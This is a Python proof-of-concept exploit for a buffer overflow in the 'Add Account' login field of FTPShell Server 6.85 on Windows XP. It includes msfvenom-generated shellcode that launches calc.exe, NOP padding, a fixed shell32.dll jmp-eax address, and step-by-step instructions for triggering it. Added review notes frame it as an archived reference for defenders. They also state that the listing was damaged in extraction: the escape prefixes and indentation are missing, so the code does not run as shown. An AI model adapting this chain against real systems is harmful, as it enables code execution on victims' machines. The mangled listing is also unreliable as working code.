#!/usr/bin/python
# Exploit Title: FTPShell Server 6.85 - Add Account Buffer Overflow
# Date: December 2nd, 2019
# Exploit Author: boku
# Vendor Homepage: http://www.ftpshell.com/index.htm
# Software Link: http://www.ftpshell.com/downloadserver.htm
# Program Name: FTPShell Server (Secure Plus edition)
# Version: Version 6.85
# Tested on: Windows XP Professional (32-bit) - 5.1.2600 Service Pack 3 Build 2600
# Recreate:
# - Install FTPShell Server v6.85
# - open 'FTPShell Server Administrator'
# - Click button 'Manage FTP Accounts..'
# - Click button 'Configure accounts..'
# - Click button 'Add'
# - Run python script & transfer 'poc.txt' to windows box
# - Open 'poc.txt' & select-all, then copy
# - Paste poc.txt text blob into 'Login' text-box
# - Press button 'OK'; program will crash & shellcode will execute

# Review notes (archived PoC, kept for defensive reference):
# - The trigger path given in the steps above is the local 'FTPShell Server
#   Administrator' GUI (pasting into the 'Login' text-box), not the network
#   listener; whether the same field is reachable over the FTP protocol is not
#   shown here.
# - The chain depends on a fixed shell32.dll address ("aslr&rebase: false")
#   on Windows XP SP3 (see header). ASLR on supported Windows versions removes
#   that assumption; the vendor-side fix is presumably bounding the 'Login'
#   field length before it is copied into the fixed-size buffer.
# - The listing was mangled in extraction: the escape-sequence prefixes in the
#   string literals and the indentation of the try-body are gone, so it does
#   not run as-is. It is documented verbatim below, not repaired.
# - Python 2 syntax throughout (print statement; str and bytes mixed freely).
blt = '33[92m[33[0m+33[92m]33[0m ' # green success bullet (ANSI colour sequence)
err = '33[91m[33[0m!33[91m]33[0m ' # red fail bullet (ANSI colour sequence)

try:
f = open('poc.txt', 'w') # open file for write (text mode; the bytes+str concatenation below is Python 2 only)
# Instructions @ Crash:
# 1. mov ecx,[esi+7c0];
# 2. mov eax,[ecx]; lea edx, [ebp-4]; push edx;
# 3. call [eax+2c4];
# exploit leaves 708 bytes for shellcode.
#msfvenom -p windows/exec CMD='calc.exe' -a x86 --platform windows -b 'x00' -v shellcode -f python
#x86/shikata_ga_nai chosen with final size 220
# Encoded payload as emitted by the msfvenom command above (20 x 11 = 220 bytes).
# Its stated effect is launching calc.exe, i.e. a benign crash-demonstration payload.
shellcode = b""
shellcode += b"xbbx4fx79xd7xcexdaxdexd9x74x24xf4"
shellcode += b"x5ax2bxc9xb1x31x31x5ax13x83xeaxfc"
shellcode += b"x03x5ax40x9bx22x32xb6xd9xcdxcbx46"
shellcode += b"xbex44x2ex77xfex33x3ax27xcex30x6e"
shellcode += b"xcbxa5x15x9bx58xcbxb1xacxe9x66xe4"
shellcode += b"x83xeaxdbxd4x82x68x26x09x65x51xe9"
shellcode += b"x5cx64x96x14xacx34x4fx52x03xa9xe4"
shellcode += b"x2ex98x42xb6xbfx98xb7x0exc1x89x69"
shellcode += b"x05x98x09x8bxcax90x03x93x0fx9cxda"
shellcode += b"x28xfbx6axddxf8x32x92x72xc5xfbx61"
shellcode += b"x8ax01x3bx9axf9x7bx38x27xfaxbfx43"
shellcode += b"xf3x8fx5bxe3x70x37x80x12x54xaex43"
shellcode += b"x18x11xa4x0cx3cxa4x69x27x38x2dx8c"
shellcode += b"xe8xc9x75xabx2cx92x2exd2x75x7ex80"
shellcode += b"xebx66x21x7dx4execxcfx6axe3xafx85"
shellcode += b"x6dx71xcaxebx6ex89xd5x5bx07xb8x5e"
shellcode += b"x34x50x45xb5x71xaex0fx94xd3x27xd6"
shellcode += b"x4cx66x2axe9xbaxa4x53x6ax4fx54xa0"
shellcode += b"x72x3ax51xecx34xd6x2bx7dxd1xd8x98"
shellcode += b"x7exf0xbax7fxedx98x12x1ax95x3bx6b"
# 3. call [eax+2c4];
# - Hexadecimal 0x2c4 = 708 decimal
# - Intended to pad the payload out to 708 bytes of 0x90 (NOP) filler so the
#   pointer read by `call [eax+2c4]` lands immediately after it.
junk1 = 'x90' * (708-len(shellcode))
# - The call [eax+2c4] instruction will pass execution to the address located at EAX+708
# - Setting [EAX+708] to an existing JMP EAX instruction will pass execution to our shellcode
# - 0x7c9ef4c9 jmp eax | (Execute&Read) shell32.dll; aslr&rebase: false
# - Little-endian encoding of that address. The fixed address only holds because
#   the module is not rebased/randomised on this XP SP3 target.
jmpEax = 'xc9xf4x9ex7c'
# 1. mov ecx,[esi+7c0];
# - ESI = 0x0012C108
# - esi+7c0 is in our supplied buffer, on the stack, at the time of the crash.
# - Control ECX @ offset 1568 bytes
# - Second filler region, sized so the three bytes below sit at offset 1568
#   (the [esi+7c0] read).
junk2 = 'x90' * (1568-len(shellcode+junk1+jmpEax))
# 2. mov eax,[ecx];
# - ECX = 0x0012B768 = PTR (located on Stack) to the beginning of our shellcode in the Heap
# - EIP 3-Byte Overwrite - 'x68xb7x12'
# - Only three bytes are written here; the fourth (0x00) comes from the program
#   (next comment), completing the pointer 0x0012B768.
ecx = 'x68xb7x12' # - EIP 3-Byte Overwrite - 'x68xb7x12
# - The 'x00' is supplied by the program when pressing the 'OK' button
# - eax is now set to the address of our shellcode.
# Final layout: payload | filler to 708 | jmp-eax pointer | filler to 1568 | 3-byte ECX value.
f.write(shellcode+junk1+jmpEax+junk2+ecx)
f.close() # close the file (no with-block: the handle leaks if write() raises)
print blt + 'poc.txt created successfully' # Python 2 print statement
except:
# NOTE(review): a bare except also catches KeyboardInterrupt/SystemExit and hides
# the real error; `except IOError as e:` with the message in the output is the usual fix.
print err + 'poc.txt failed to create'